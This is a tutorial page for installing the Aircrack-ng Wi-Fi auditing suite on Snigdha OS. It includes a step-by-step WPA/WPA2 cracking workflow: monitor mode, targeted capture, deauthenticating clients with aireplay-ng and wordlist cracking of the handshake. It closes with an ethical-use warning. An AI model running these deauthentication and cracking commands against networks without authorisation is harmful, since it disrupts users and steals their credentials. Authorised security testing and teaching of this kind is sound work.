Aircrack-NG
π Aircrack-ng: A Complete Guide with Installation on Snigdha OSβ
Aircrack-ng is a powerful suite of tools used for monitoring, testing, cracking, and securing Wi-Fi networks. This guide will cover how to install Aircrack-ng on Snigdha OS and explain its key tools. Letβs dive in! π
π οΈ How to Install Aircrack-ng on Snigdha OSβ
-
Update Your System: Always ensure your system is up-to-date before installing new software:
sudo pacman -Syu -
Install Aircrack-ng: Aircrack-ng is available in the official Snigdha OS repositories:
sudo pacman -S aircrack-ng -
Verify Installation: Check that Aircrack-ng is installed correctly by running:
aircrack-ng --helpIf installed successfully, you'll see a list of commands and options. β
π§° Aircrack-ng Tools Overviewβ
The Aircrack-ng suite includes several tools for various purposes:
-
Airmon-ng (Monitor Mode Enabler) π°οΈ
Enables monitor mode on your wireless network interface.Usage:
sudo airmon-ng start wlan0This sets your
wlan0device to monitor mode, allowing you to capture Wi-Fi traffic. -
Airodump-ng (Packet Capture) π‘
Captures packets and displays information about nearby wireless networks.Usage:
sudo airodump-ng wlan0monReplace
wlan0monwith your monitor-enabled interface. It displays SSIDs, BSSIDs, channels, and more. -
Aireplay-ng (Packet Injection) π―
Injects packets to test network security or deauthenticate clients.Usage:
Deauthenticate a client to capture a handshake:sudo aireplay-ng --deauth 10 -a <BSSID> -c <CLIENT_MAC> wlan0mon<BSSID>: MAC address of the target access point.<CLIENT_MAC>: MAC address of the client.
-
Aircrack-ng (Password Cracker) π
Cracks WPA/WPA2 passwords using captured handshakes.Usage:
aircrack-ng -w wordlist.txt -b <BSSID> capture_file.capwordlist.txt: File containing potential passwords.capture_file.cap: Packet capture file with the handshake.
-
Airdecap-ng (Decrypt Packets) π
Decrypts WEP/WPA-encrypted packets after obtaining keys.Usage:
airdecap-ng -w <WPA_KEY> capture_file.cap
π Example Workflow: Cracking WPA/WPA2β
-
Enable Monitor Mode:
Start monitoring with Airmon-ng:sudo airmon-ng start wlan0 -
Capture Packets:
Use Airodump-ng to scan for networks:sudo airodump-ng wlan0monFocus on a target by capturing packets on its channel:
sudo airodump-ng --bssid <BSSID> --channel <CHANNEL> --write capture wlan0mon -
Deauthenticate a Client:
Force a client to reconnect to capture the WPA handshake:sudo aireplay-ng --deauth 10 -a <BSSID> -c <CLIENT_MAC> wlan0mon -
Crack the Handshake:
Use Aircrack-ng with a wordlist to crack the password:aircrack-ng -w wordlist.txt -b <BSSID> capture-01.cap
β οΈ Important Notesβ
-
Ethical Use Only:
Always obtain explicit permission before testing any network. Unauthorized use is illegal. -
Hardware Compatibility:
Ensure your wireless card supports monitor mode and packet injection. Popular chipsets include Atheros and Realtek. -
Wordlist Quality:
Cracking success depends on your wordlist. Use comprehensive wordlists likerockyou.txtor generate custom ones. -
Alternative Tools:
Combine Aircrack-ng with tools like hashcat for advanced cracking.